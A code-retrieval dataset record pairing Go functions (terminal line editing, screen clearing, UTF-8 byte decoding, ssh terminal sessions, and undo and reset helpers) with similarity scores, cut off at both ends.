true\n\t\t\trl.tcDisplayType = TabDisplayMap\n\t\t\trl.tcSuggestions, rl.tcDescriptions = rl.autocompleteHistory()\n\t\t\trl.initTabCompletion()\n\n\t\t\trl.modeTabFind = true\n\t\t\trl.updateTabFind([]rune{})\n\t\t\trl.viUndoSkipAppend = true\n\n\t\tcase charCtrlU:\n\t\t\trl.clearLine()\n\t\t\trl.resetHelpers()\n\n\t\tcase charTab:\n\t\t\tif rl.modeTabCompletion {\n\t\t\t\trl.moveTabCompletionHighlight(1, 0)\n\t\t\t} else {\n\t\t\t\trl.getTabCompletion()\n\t\t\t}\n\n\t\t\trl.renderHelpers()\n\t\t\trl.viUndoSkipAppend = true\n\n\t\tcase '\\r':\n\t\t\tfallthrough\n\t\tcase '\\n':\n\t\t\tvar suggestions []string\n\t\t\tif rl.modeTabFind {\n\t\t\t\tsuggestions = rl.tfSuggestions\n\t\t\t} else {\n\t\t\t\tsuggestions = rl.tcSuggestions\n\t\t\t}\n\n\t\t\tif rl.modeTabCompletion && len(suggestions) > 0 {\n\t\t\t\tcell := (rl.tcMaxX * (rl.tcPosY - 1)) + rl.tcOffset + rl.tcPosX - 1\n\t\t\t\trl.clearHelpers()\n\t\t\t\trl.resetTabCompletion()\n\t\t\t\trl.renderHelpers()\n\t\t\t\trl.insert([]rune(suggestions[cell]))\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trl.carridgeReturn()\n\t\t\treturn string(rl.line), nil\n\n\t\tcase charBackspace, charBackspace2:\n\t\t\tif rl.modeTabFind {\n\t\t\t\trl.backspaceTabFind()\n\t\t\t\trl.viUndoSkipAppend = true\n\t\t\t} else {\n\t\t\t\trl.backspace()\n\t\t\t\trl.renderHelpers()\n\t\t\t}\n\n\t\tcase charEscape:\n\t\t\trl.escapeSeq(r[:i])\n\n\t\tdefault:\n\t\t\tif rl.modeTabFind {\n\t\t\t\trl.updateTabFind(r[:i])\n\t\t\t\trl.viUndoSkipAppend = true\n\t\t\t} else {\n\t\t\t\trl.readlineInput(r[:i])\n\t\t\t\tif len(rl.multiline) > 0 && rl.modeViMode == vimKeys {\n\t\t\t\t\trl.skipStdinRead = true\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t//if !rl.viUndoSkipAppend {\n\t\t//\trl.viUndoHistory = append(rl.viUndoHistory, rl.line)\n\t\t//}\n\t\trl.undoAppendHistory()\n\t}\n}", "func ClearScreen() {\n\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\tcmd = exec.Command(\"clear\")\n\tcase \"darwin\":\n\t\tcmd = exec.Command(\"clear\")\n\t}\n\tcmd.Stdout = os.Stdout\n\tcmd.Run()\n}", "func (l *LexerEngine) PopMode() {\n\tif len(l.modeStack) == 0 {\n\t\tl.err = errors.New(\"pop empty mode stack\")\n\t\treturn\n\t}\n\tlast := len(l.modeStack) - 1\n\tl.mode = l.modeStack[last]\n\tl.modeStack = l.modeStack[:last]\n}", "func (c *CmdBuff) Reset() {\n\tc.ClearText(true)\n\tc.SetActive(false)\n\tc.fireBufferCompleted(c.GetText(), c.GetSuggestion())\n}", "func (tb *TextBuf) EmacsUndoSave() {\n\tif !tb.Opts.EmacsUndo || len(tb.UndoUndos) == 0 {\n\t\treturn\n\t}\n\tfor _, utbe := range tb.UndoUndos {\n\t\ttb.Undos = append(tb.Undos, utbe)\n\t}\n\ttb.UndoPos = len(tb.Undos)\n\t// fmt.Printf(\"emacs undo save new pos: %v\\n\", tb.UndoPos)\n\ttb.UndoUndos = nil\n}", "func prepareTerminal() (reset func()) {\n\treturn func() {}\n}", "func ResetMode(c *Client, opts ResetOptions, cmt Commitish) error {\n\tif !opts.Soft && !opts.Mixed && !opts.Hard && !opts.Merge && !opts.Keep {\n\t\t// The default mode is mixed if none were specified.\n\t\topts.Mixed = true\n\t}\n\n\t// Update HEAD to cmt\n\t// If soft -- nothing else\n\t// if mixed -- read-tree cmt\n\t// if hard -- read-tree cmt && checkout-index -f -all\n\t// if merge | keep-- read man page more carefully, for now return an error\n\n\tif opts.Merge {\n\t\treturn fmt.Errorf(\"ResetMode --merge Not implemented\")\n\t}\n\tif opts.Keep {\n\t\treturn fmt.Errorf(\"ResetMode --keep Not implemented\")\n\t}\n\n\tcomm, err := cmt.CommitID(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif err := UpdateRef(c, UpdateRefOptions{}, \"HEAD\", comm, fmt.Sprintf(\"reset: moving to %v\", comm)); err != nil {\n\t\treturn err\n\t}\n\tif opts.Mixed || opts.Hard {\n\t\tidx, err := ReadTree(c, ReadTreeOptions{Reset: true, Update: true}, comm)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif opts.Hard {\n\t\t\tif err := CheckoutIndexUncommited(c, idx, CheckoutIndexOptions{All: true, Force: true, UpdateStat: true}, nil); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func clearScreen() {\n\tc := exec.Command(\"clear\")\n\tc.Stdout = os.Stdout\n\tc.Run()\n}", "func clearScreen() {\n\tc := exec.Command(\"clear\")\n\tc.Stdout = os.Stdout\n\tc.Run()\n}", "func MakeRaw(fd uintptr) (*State, error) {\n\tvar state *State\n\tstate, err := SaveState(fd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// see http://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx for these flag settings\n\tstate.mode &^= (ENABLE_ECHO_INPUT | ENABLE_PROCESSED_INPUT | ENABLE_LINE_INPUT)\n\terr = SetConsoleMode(fd, state.mode)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn state, nil\n}", "func (self *TextView) ResetIMContext() {\n\tC.gtk_text_view_reset_im_context(self.object)\n}", "func (sf *suFile) reset() {\n\tif sf.mode == \"r\" {\n\t\tsf.r.Reset(sf.f)\n\t} else {\n\t\terr := sf.w.Flush()\n\t\tsf.w.Reset(sf.f)\n\t\tif err != nil {\n\t\t\tpanic(\"File: \" + err.Error())\n\t\t}\n\t}\n}", "func (ls *linestate) editSwap() {\n\tif ls.pos > 0 && ls.pos < len(ls.buf) {\n\t\ttmp := ls.buf[ls.pos-1]\n\t\tls.buf[ls.pos-1] = ls.buf[ls.pos]\n\t\tls.buf[ls.pos] = tmp\n\t\tif ls.pos != len(ls.buf)-1 {\n\t\t\tls.pos++\n\t\t}\n\t\tls.refreshLine()\n\t}\n}", "func (file *File) UnsetTabStr() {\n\tfile.tabDetect = true\n\tfile.ComputeIndent()\n}", "func (proc *Proc) Restore(p *os.Process) {\n\tproc.Pid = p.Pid\n\tproc.process = p\n\tproc.Status.SetStatus(\"restored\")\n}", "func (c *Conn) resetDecoder() {\n\t*c.decoder = c.saved // Heh.\n}", "func (r *Raft) setCurrentTerm(t uint64) error {\n\t// Make persistence\n\tif err := r.stable.SetUint64(keyCurrentTerm, t); err != nil {\n\t\tr.logE.Printf(\"Failed to save current term: %w\", err)\n\t\treturn err\n\t}\n\tr.raftState.setCurrentTerm(t)\n\treturn nil\n}", "func (sc *sshclient) runclient(ctx context.Context, address string) error {\n\tconn, err := ssh.Dial(\"tcp\", address, sc.config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot connect to %v: %v\", address, err)\n\t}\n\tdefer conn.Close()\n\n\tsession, err := conn.NewSession()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot open new session: %v\", err)\n\t}\n\tdefer session.Close()\n\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tconn.Close()\n\t}()\n\n\t/*\n\t\tfd := int(os.Stdin.Fd())\n\t\tstate, err := terminal.MakeRaw(fd)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"terminal make raw: %s\", err)\n\t\t}\n\t\tdefer terminal.Restore(fd, state)\n\t*/\n\tcurrent := console.Current()\n\tdefer current.Reset()\n\n\terr = current.SetRaw()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"terminal make raw: %s\", err)\n\t}\n\n\t// fd2 := int(os.Stdout.Fd())\n\t// w, h, err := terminal.GetSize(fd2)\n\t// if err != nil {\n\t// \treturn fmt.Errorf(\"terminal get size: %s\", err)\n\t// }\n\n\tws, err := current.Size()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"terminal get size: %s\", err)\n\t}\n\n\th := int(ws.Height)\n\tw := int(ws.Width)\n\n\tmodes := ssh.TerminalModes{\n\t\tssh.ECHO: 1,\n\t\tssh.TTY_OP_ISPEED: 14400,\n\t\tssh.TTY_OP_OSPEED: 14400,\n\t}\n\n\tterm := os.Getenv(\"TERM\")\n\tif term == \"\" {\n\t\tterm = \"xterm-256color\"\n\t}\n\tif err := session.RequestPty(term, h, w, modes); err != nil {\n\t\treturn fmt.Errorf(\"session xterm: %s\", err)\n\t}\n\n\tsession.Stdout = os.Stdout\n\tsession.Stderr = os.Stderr\n\tsession.Stdin = os.Stdin\n\n\tif err := session.Shell(); err != nil {\n\t\treturn fmt.Errorf(\"session shell: %s\", err)\n\t}\n\n\tif err := session.Wait(); err != nil {\n\t\tif e, ok := err.(*ssh.ExitError); ok {\n\t\t\tswitch e.ExitStatus() {\n\t\t\tcase 130:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t\treturn fmt.Errorf(\"ssh: %s\", err)\n\t}\n\treturn nil\n}", "func ExitAltScreen() {\n\tfmt.Print(CSI + ExitAltScreenSeq)\n}", "func (e *EntryManager) RestorePos(path string) {\n\tpos, ok := e.selectPos[path]\n\tif !ok {\n\t\tpos = selectPos{1, 0}\n\t}\n\n\te.Select(pos.row, pos.col)\n}", "func Restore(output Output) func(cmd *cli.Cmd) {\n\treturn func(cmd *cli.Cmd) {\n\t\tconfigOpts := addConfigOptions(cmd)\n\t\tsilentOpt := cmd.BoolOpt(\"s silent\", false, \"If state already exists don't throw error\")\n\t\tfilename := cmd.StringArg(\"FILE\", \"\", \"Restore from this dump\")\n\t\tcmd.Spec += \"[--silent] [FILE]\"\n\n\t\tcmd.Action = func() {\n\t\t\tconf, err := configOpts.obtainBurrowConfig()\n\t\t\tif err != nil {\n\t\t\t\toutput.Fatalf(\"could not set up config: %v\", err)\n\t\t\t}\n\n\t\t\tif err := conf.Verify(); err != nil {\n\t\t\t\toutput.Fatalf(\"cannot continue with config: %v\", err)\n\t\t\t}\n\n\t\t\toutput.Logf(\"Using validator address: %s\", *conf.ValidatorAddress)\n\n\t\t\tkern, err := core.NewKernel(conf.HscDir)\n\t\t\tif err != nil {\n\t\t\t\toutput.Fatalf(\"could not create Hive Smart Chain kernel: %v\", err)\n\t\t\t}\n\n\t\t\tif err = kern.LoadLoggerFromConfig(conf.Logging); err != nil {\n\t\t\t\toutput.Fatalf(\"could not create Hive Smart Chain kernel: %v\", err)\n\t\t\t}\n\n\t\t\tif err = kern.LoadDump(conf.GenesisDoc, *filename, *silentOpt); err != nil {\n\t\t\t\toutput.Fatalf(\"could not create Hive Smart Chain kernel: %v\", err)\n\t\t\t}\n\n\t\t\tkern.ShutdownAndExit()\n\t\t}\n\t}\n}", "func (r repl) ReadLine() (string, error) {\n\tfd := int(os.Stdin.Fd())\n\toldState, err := term.MakeRaw(fd)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer func() {\n\t\terr := term.Restore(fd, oldState)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n\n\treturn r.term.ReadLine()\n}", "func (tto *TtoT) Reset() {\n\ttto.PutChar(dg.ASCIIFF)\n\tlog.Println(\"INFO: TTO Reset\")\n}", "func Reset() string {\n\treturn csi(\"m\")\n}", "func SetMode(flag int) (reset func()) {\n\tMustTestMode()\n\told := mode\n\treset = func() {\n\t\tmode = old\n\t}\n\tmode = flag\n\treturn\n}", "func Unset() {\n\tif NoColor {\n\t\treturn\n\t}\n\n\tOutput.Write(unsafeByteSlice(escapePrefix + Reset.String() + escapeSuffix))\n}", "func Reset() {\n\tC.yices_reset()\n}", "func ClearScreen() {\n\t// Attempt to clear cli screen.\n\tswitch runtime.GOOS {\n\tcase \"windows\":\n\t\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\") //Windows example, its tested\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\t\treturn\n\t}\n\n\tprint(\"\\033[H\\033[2J\")\n}", "func Reset() (int, error) {\n\tif !Enable { // not enable\n\t\treturn 0, nil\n\t}\n\n\t// on windows cmd.exe\n\tif isLikeInCmd {\n\t\treturn winReset()\n\t}\n\n\treturn fmt.Print(ResetSet)\n}", "func (ipset *IPSet) Restore() error {\n\tstdin := bytes.NewBufferString(buildIPSetRestore(ipset))\n\terr := ipset.runWithStdin(stdin, \"restore\", \"-exist\")\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func hideCursor() {\n\tfmt.Printf(\"\\033[?25l\")\n}", "func (c *Console) SetANSIReset(code log.ANSIEscSeq) {\n\tc.ansiReset = code\n}", "func RestoreTokenTypes() {\n\ttm := make([]string, TokenTypes)\n\tfor i := 0; i < TokenTypes; i++ {\n\t\ttm[i] = tokenMap[i]\n\t}\n\ttokenMap = tm\n}", "func ClearScreen() {\n\n\tc := exec.Command(\"clear\")\n\tc.Stdout = os.Stdout\n\tc.Run()\n\n}", "func (c *CursesConfig) SetCommandMode(mode tileslib.CommandModeType) {\n\tc.base.CommandMode = mode\n}", "func setState(state *bytes.Buffer) error {\n\tcmd := exec.Command(\"stty\", state.String())\n\tcmd.Stdin = os.Stdin\n\tcmd.Stdout = os.Stdout\n\treturn cmd.Run()\n}" ]
[ "0.77427965", "0.7543272", "0.74539554", "0.71161926", "0.6849582", "0.67580074", "0.6674304", "0.6480208", "0.6445519", "0.6392272", "0.63900316", "0.6365112", "0.6365112", "0.63387257", "0.62861365", "0.6114559", "0.5983823", "0.5850905", "0.58457255", "0.5747718", "0.57414126", "0.56395555", "0.5554471", "0.55393386", "0.55303097", "0.5499778", "0.5444934", "0.5440579", "0.5430736", "0.5418143", "0.5318911", "0.5288642", "0.51866686", "0.5162227", "0.51474124", "0.5129309", "0.5113426", "0.5094566", "0.50829536", "0.5028504", "0.5011176", "0.49985823", "0.49508157", "0.49392194", "0.49184093", "0.49150425", "0.48351908", "0.48020554", "0.4795157", "0.47766036", "0.4774709", "0.47657582", "0.47647446", "0.47582036", "0.47501153", "0.4733139", "0.469509", "0.46848315", "0.46761775", "0.46665642", "0.46625423", "0.4651957", "0.46406734", "0.46122563", "0.45913625", "0.4586322", "0.45713153", "0.45498046", "0.4540543", "0.45397687", "0.45397687", "0.45395008", "0.45395008", "0.4528159", "0.45232868", "0.45169672", "0.45080915", "0.44925925", "0.44914347", "0.44812512", "0.4479947", "0.44729763", "0.44656673", "0.4462595", "0.44596016", "0.44509968", "0.4446045", "0.44370726", "0.4429241", "0.44253173", "0.44188914", "0.44089156", "0.44045416", "0.43897817", "0.43832007", "0.43831784", "0.4382044", "0.4372454", "0.43706712", "0.43694675" ]
0.6962825
4
Add a byte to a utf8 decode. Return the rune and it's size in bytes.
func (u *utf8) add(c byte) (r rune, size int) { switch u.state { case getByte0: if c&0x80 == 0 { // 1 byte return rune(c), 1 } else if c&0xe0 == 0xc0 { // 2 byte u.val = int32(c&0x1f) << 6 u.count = 2 u.state = get1More return KeycodeNull, 0 } else if c&0xf0 == 0xe0 { // 3 bytes u.val = int32(c&0x0f) << 6 u.count = 3 u.state = get2More return KeycodeNull, 0 } else if c&0xf8 == 0xf0 { // 4 bytes u.val = int32(c&0x07) << 6 u.count = 4 u.state = get3More return KeycodeNull, 0 } case get3More: if c&0xc0 == 0x80 { u.state = get2More u.val |= int32(c & 0x3f) u.val <<= 6 return KeycodeNull, 0 } case get2More: if c&0xc0 == 0x80 { u.state = get1More u.val |= int32(c & 0x3f) u.val <<= 6 return KeycodeNull, 0 } case get1More: if c&0xc0 == 0x80 { u.state = getByte0 u.val |= int32(c & 0x3f) return rune(u.val), u.count } } // Error u.state = getByte0 return unicode.ReplacementChar, 1 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (UTF8Decoder) DecodeRune(p []byte) (rune, int) { return utf8.DecodeRune(p) }", "func (s *scratch) addRune(r rune) int {\n\tif s.fill+utf8.UTFMax >= cap(s.data) {\n\t\ts.grow()\n\t}\n\n\tn := utf8.EncodeRune(s.data[s.fill:], r)\n\ts.fill += n\n\treturn n\n}", "func (t *TelWindow) AddByte(b byte) {\n \n}", "func main() {\n\tfmt.Println(countByte(\"asSASA ddd dsjkdsjs dk\"))\n\tfmt.Println(countByte(\"asSASA ddd dsjkdsjsこん dk\"))\n}", "func decodeMUTF8(bytearr []byte) string {\n\tutflen := len(bytearr)\n\tchararr := make([]uint16, utflen)\n\n\tvar c, char2, char3 uint16\n\tcount := 0\n\tchararr_count := 0\n\n\tfor count < utflen {\n\t\tc = uint16(bytearr[count])\n\t\tif c > 127 {\n\t\t\tbreak\n\t\t}\n\t\tcount++\n\t\tchararr[chararr_count] = c\n\t\tchararr_count++\n\t}\n\n\tfor count < utflen {\n\t\tc = uint16(bytearr[count])\n\t\tswitch c >> 4 {\n\t\tcase 0, 1, 2, 3, 4, 5, 6, 7:\n\t\t\t/* 0xxxxxxx*/\n\t\t\tcount++\n\t\t\tchararr[chararr_count] = c\n\t\t\tchararr_count++\n\t\tcase 12, 13:\n\t\t\t/* 110x xxxx 10xx xxxx*/\n\t\t\tcount += 2\n\t\t\tif count > utflen {\n\t\t\t\tpanic(\"malformed input: partial character at end\")\n\t\t\t}\n\t\t\tchar2 = uint16(bytearr[count-1])\n\t\t\tif char2&0xC0 != 0x80 {\n\t\t\t\tpanic(fmt.Errorf(\"malformed input around byte %v\", count))\n\t\t\t}\n\t\t\tchararr[chararr_count] = c&0x1F<<6 | char2&0x3F\n\t\t\tchararr_count++\n\t\tcase 14:\n\t\t\t/* 1110 xxxx 10xx xxxx 10xx xxxx*/\n\t\t\tcount += 3\n\t\t\tif count > utflen {\n\t\t\t\tpanic(\"malformed input: partial character at end\")\n\t\t\t}\n\t\t\tchar2 = uint16(bytearr[count-2])\n\t\t\tchar3 = uint16(bytearr[count-1])\n\t\t\tif char2&0xC0 != 0x80 || char3&0xC0 != 0x80 {\n\t\t\t\tpanic(fmt.Errorf(\"malformed input around byte %v\", (count - 1)))\n\t\t\t}\n\t\t\tchararr[chararr_count] = c&0x0F<<12 | char2&0x3F<<6 | char3&0x3F<<0\n\t\t\tchararr_count++\n\t\tdefault:\n\t\t\t/* 10xx xxxx, 1111 xxxx */\n\t\t\tpanic(fmt.Errorf(\"malformed input around byte %v\", count))\n\t\t}\n\t}\n\t// The number of chars produced may be less than utflen\n\tchararr = chararr[0:chararr_count]\n\trunes := utf16.Decode(chararr)\n\treturn string(runes)\n}", "func (u *utf8) getRune(fd int, timeout *syscall.Timeval) rune {\n\t// use select() for the timeout\n\tif timeout != nil {\n\t\tfor true {\n\t\t\trd := syscall.FdSet{}\n\t\t\tfdset.Set(fd, &rd)\n\t\t\tn, err := syscall.Select(fd+1, &rd, nil, nil, timeout)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif n == 0 {\n\t\t\t\t// nothing is readable\n\t\t\t\treturn KeycodeNull\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\t// Read the file descriptor\n\tbuf := make([]byte, 1)\n\t_, err := syscall.Read(fd, buf)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"read error %s\\n\", err))\n\t}\n\t// decode the utf8\n\tr, size := u.add(buf[0])\n\tif size == 0 {\n\t\t// incomplete utf8 code point\n\t\treturn KeycodeNull\n\t}\n\tif size == 1 && r == unicode.ReplacementChar {\n\t\t// utf8 decode error\n\t\treturn KeycodeNull\n\t}\n\treturn r\n}", "func (enc *Encoding) AppendDecode(dst, src []byte) ([]byte, error) {\n\t// Compute the output size without padding to avoid over allocating.\n\tn := len(src)\n\tfor n > 0 && rune(src[n-1]) == enc.padChar {\n\t\tn--\n\t}\n\tn = decodedLen(n, NoPadding)\n\n\tdst = slices.Grow(dst, n)\n\tn, err := enc.Decode(dst[len(dst):][:n], src)\n\treturn dst[:len(dst)+n], err\n}", "func AppendRuneBytes(dest *[]byte, r rune) int {\n\tif size := utf8.RuneLen(r); size == -1 {\n\t\tmod.Error(\"utf8.RuneLen(r) == -1\")\n\t\treturn -1\n\t}\n\tvar buf [utf8.UTFMax]byte\n\tret := utf8.EncodeRune(buf[:], r)\n\t(*dest) = append((*dest), buf[:ret]...)\n\treturn ret\n}", "func (cs charSums) add(r rune) {\n\tcs[r-'A']++\n}", "func (p *Packet) AddByte(b uint8) *Packet {\n\tp.Payload = append(p.Payload, b)\n\treturn p\n}", "func decodeByteSize(raw string) (uint32, error) {\n\tif raw == \"\" {\n\t\treturn 0, fmt.Errorf(\"size is empty\")\n\t}\n\tvar re = regexp.MustCompile(`^(?P<size>[0-9]+)\\s*(?i)(?P<unit>(k|m|g))b?$`)\n\tif re.MatchString(raw) {\n\t\tsize, err := strconv.ParseUint(re.ReplaceAllString(raw, \"${size}\"), 0, 64)\n\t\tif err != nil {\n\t\t\treturn 0, fmt.Errorf(\"value '%s' cannot be parsed with uint32\", raw)\n\t\t}\n\t\tunit := re.ReplaceAllString(raw, \"${unit}\")\n\t\tswitch strings.ToLower(unit) {\n\t\tcase \"g\":\n\t\t\tsize = size << 10\n\t\t\tfallthrough\n\t\tcase \"m\":\n\t\t\tsize = size << 10\n\t\t\tfallthrough\n\t\tcase \"k\":\n\t\t\tsize = size << 10\n\t\t}\n\t\tif size > math.MaxUint32 {\n\t\t\treturn 0, fmt.Errorf(\"value '%s' overflows uint32\", raw)\n\t\t}\n\t\treturn uint32(size), nil\n\t}\n\treturn 0, fmt.Errorf(\"value '%s' cannot be compiled\", raw)\n}", "func WriteChar(buffer []byte, offset int, value rune) {\n WriteUInt8(buffer, offset, uint8(value))\n}", "func (e *Encoder) PrependUtf8(str string) (uint64, error) {\n\tif e == nil {\n\t\treturn 0, errors.New(errors.KsiInvalidArgumentError)\n\t}\n\n\tvar (\n\t\tstrLen = uint64(len(str))\n\t\tbufLen = uint64(len(e.buffer))\n\t)\n\t// Verify buffer capacity.\n\tif (e.position+uint64(1) < (strLen + 1)) || bufLen <= e.position {\n\t\treturn 0, errors.New(errors.KsiBufferOverflow).AppendMessage(\"Buffer to serialize string is too small.\")\n\t}\n\n\te.buffer[e.position] = 0\n\tc := uint64(copy(e.buffer[e.position-strLen:], str))\n\te.position -= c + 1\n\n\treturn c + 1, nil\n}", "func (str JString) ModifiedUTF8LenE(env JNIEnv) int {\n\treturn env.GetStringUTFLength(str)\n}", "func (f *Font) SizeUTF8(text string) (int, int, error) {\n\t_text := C.CString(text)\n\tdefer C.free(unsafe.Pointer(_text))\n\tvar w C.int\n\tvar h C.int\n\tresult := C.TTF_SizeUTF8(f.f, _text, &w, &h)\n\tif result == 0 {\n\t\treturn int(w), int(h), nil\n\t}\n\treturn int(w), int(h), GetError()\n}", "func (arg1 *UConverter) GetMaxCharSize() int", "func toUint(r rune) uint {\n\treturn uint(r) - '0'\n}", "func byteToUint8(b byte) (n uint8) {\n\tn |= uint8(b)\n\treturn\n}", "func (r *VarintReader) ReadByte() (c byte, err error) {\n\tn, err := r.Read(r.buf[:])\n\tif n > 0 {\n\t\tc = r.buf[0]\n\t\tr.bytesRead++\n\t}\n\treturn\n}", "func (b *Buffer) AppendUint8(x uint8) error {\n\treturn b.appendInteger(x)\n}", "func (str JString) ModifiedUTF8Len() int {\n\tenv := GoJNIEnv(GetDefaultJNIEnv())\n\treturn str.ModifiedUTF8LenE(env)\n}", "func (r *Reader) ReadByte() (byte, error) {\n\tr.prevRune = -1\n\tif r.i >= int64(len(r.s)) {\n\t\treturn 0, io.EOF\n\t}\n\tb := r.s[r.i]\n\tr.i++\n\treturn b, nil\n}", "func (arg1 *UConverter) ToUTF8(arg2 []byte, arg3 *UErrorCode) string", "func (w ByteWriter) Write(p []rune) (n int, err error) {\n\treturn w.Writer.Write([]byte(string(p)))\n}", "func (str JString) UTF16LenE(env JNIEnv) int {\n\treturn env.GetStringLength(str)\n}", "func AssertUnescapedByte(t *testing.T, e escape.Escaper, c byte) {\n\trequire.Equal(t, string(c), computeReplacement(e, c))\n}", "func execDecodeRune(_ int, p *gop.Context) {\n\targs := p.GetArgs(1)\n\tret, ret1 := utf8.DecodeRune(args[0].([]byte))\n\tp.Ret(1, ret, ret1)\n}", "func uLen(s string) int {\n\treturn utf8.RuneCountInString(s)\n}", "func (p *atomReader) ReadUnsignedByte() uint8 {\n\tc, _ := p.r.ReadByte()\n\treturn c\n}", "func BPCharFromByte(val byte) driver.Valuer {\n\treturn charFromByte{val: val}\n}", "func (recv *Value) GetUchar() uint8 {\n\tretC := C.g_value_get_uchar((*C.GValue)(recv.native))\n\tretGo := (uint8)(retC)\n\n\treturn retGo\n}", "func (UTF8Decoder) FullRune(p []byte) bool { return utf8.FullRune(p) }", "func readModUTF8(b []byte) rune {\n\tvar res rune\n\tc := b[0] >> 4\n\tif len(b) == 1 {\n\t\tres = rune(c >> 4)\n\t} else if len(b) == 2 {\n\t\tres = rune(((c & 0x1F) << 6) | (b[1] & 0x3F))\n\t} else if len(b) == 3 {\n\t\tfmt.Println(\"case3\")\n\t\t//var j uint16 = ((c & 0x0f) << 12)\n\t\tres = rune(((c & 0x0F) << 12) |\n\t\t\t((b[1] & 0x3F) << 6) |\n\t\t\t((b[2] & 0x3F) << 0))\n\t}\n\treturn res\n}", "func execDecodeRuneInString(_ int, p *gop.Context) {\n\targs := p.GetArgs(1)\n\tret, ret1 := utf8.DecodeRuneInString(args[0].(string))\n\tp.Ret(1, ret, ret1)\n}", "func (decoder *berDecoder) decodeLength() (int, error) {\n\tvar length int\n\tfirstByte, err := decoder.ReadByte()\n\tif err != nil {\n\t\treturn 0, fmt.Errorf(\"Couldn't read byte at pos %d, err: %s\", decoder.pos, err)\n\t}\n\tdecoder.pos++\n\tif firstByte < 127 {\n\t\tlength = int(firstByte)\n\t\treturn length, nil\n\t}\n\tfor numBytes := firstByte; numBytes > 0; numBytes-- {\n\t\ttemp, err := decoder.ReadByte()\n\t\tif err != nil {\n\t\t\treturn 0, fmt.Errorf(\"Couldn't read byte at pos %d, err: %s\", decoder.pos, err)\n\t\t}\n\t\tdecoder.pos++\n\t\tlength <<= 8\n\t\tlength += int(temp)\n\t}\n\tif length < 0 {\n\t\treturn 0, fmt.Errorf(\"Decoding length field found negative value: %d at pos %d\", length, decoder.pos)\n\t}\n\treturn length, nil\n}", "func (decoder *EbpfDecoder) DecodeUint8(msg *uint8) error {\n\treadAmount := 1\n\toffset := decoder.cursor\n\tif len(decoder.buffer[offset:]) < readAmount {\n\t\treturn fmt.Errorf(\"can't read context from buffer: buffer too short\")\n\t}\n\t*msg = decoder.buffer[decoder.cursor]\n\tdecoder.cursor += readAmount\n\treturn nil\n}", "func ReadChar(buffer []byte, offset int) rune {\n return rune(ReadUInt8(buffer, offset))\n}", "func (r *readRune) readByte() (b byte, err error) {\n\tif r.pending > 0 {\n\t\tb = r.pendBuf[0]\n\t\tcopy(r.pendBuf[0:], r.pendBuf[1:])\n\t\tr.pending--\n\t\treturn\n\t}\n\tn, err := io.ReadFull(r.reader, r.pendBuf[:1])\n\tif n != 1 {\n\t\treturn 0, err\n\t}\n\treturn r.pendBuf[0], err\n}", "func ulen(buf []byte) uint { return uint(len(buf)) }", "func (arg1 *UConverter) GetMinCharSize() int", "func (arg1 *UConverter) GetSubstChars(arg2 *UErrorCode) []byte", "func DecodeUTF8CodepointsToRawBytes(utf8Str string) ([]byte, error) {\n\trunes := []rune(utf8Str)\n\trawBytes := make([]byte, len(runes))\n\tfor i, r := range runes {\n\t\tif (r & 0xFF) != r {\n\t\t\treturn nil, fmt.Errorf(\"character out of range: %d\", r)\n\t\t}\n\t\trawBytes[i] = byte(r)\n\t}\n\treturn rawBytes, nil\n}", "func DecodedLen(src []byte) (int, error) {\n\tv, _, err := decodedLen(src)\n\treturn v, err\n}", "func IsByte(m string) bool { return m == \"b\" }", "func (UTF8Decoder) Max() int { return utf8.UTFMax }", "func (e *Encoder) Byte(v int8) (int, error) {\n\tb := make([]byte, ByteSize)\n\tb[0] = byte(v)\n\treturn e.buf.Write(b)\n}", "func (m Measurement) AddUInt8(name string, value uint8) Measurement {\n\tm.fieldSet[name] = value\n\treturn m\n}", "func byteToChar(b []byte) *C.char {\n\tvar c *C.char\n\tif len(b) > 0 {\n\t\tc = (*C.char)(unsafe.Pointer(&b[0]))\n\t}\n\treturn c\n}", "func (b *Builder) WriteRune(s rune) (int, error) {\n\tn, err := b.message.WriteRune(s)\n\tb.utf16length += utf16RuneLen(s)\n\treturn n, err\n}", "func Addstring(s *sym.Symbol, str string) int64 {\n\tif s.Type == 0 {\n\t\ts.Type = sym.SNOPTRDATA\n\t}\n\ts.Attr |= sym.AttrReachable\n\tr := s.Size\n\tif s.Name == \".shstrtab\" {\n\t\telfsetstring(s, str, int(r))\n\t}\n\ts.P = append(s.P, str...)\n\ts.P = append(s.P, 0)\n\ts.Size = int64(len(s.P))\n\treturn r\n}", "func AssertEscapingByte(t *testing.T, e escape.Escaper, want string, c byte) {\n\trequire.Equal(t, want, computeReplacement(e, c))\n}", "func (this *ExpGolombDecoder) DecodeByte() byte {\n\tif this.bitstream.ReadBit() == 1 {\n\t\treturn 0\n\t}\n\n\t// Decode unsigned\n\tlog2 := uint(1)\n\n\tfor {\n\t\tif 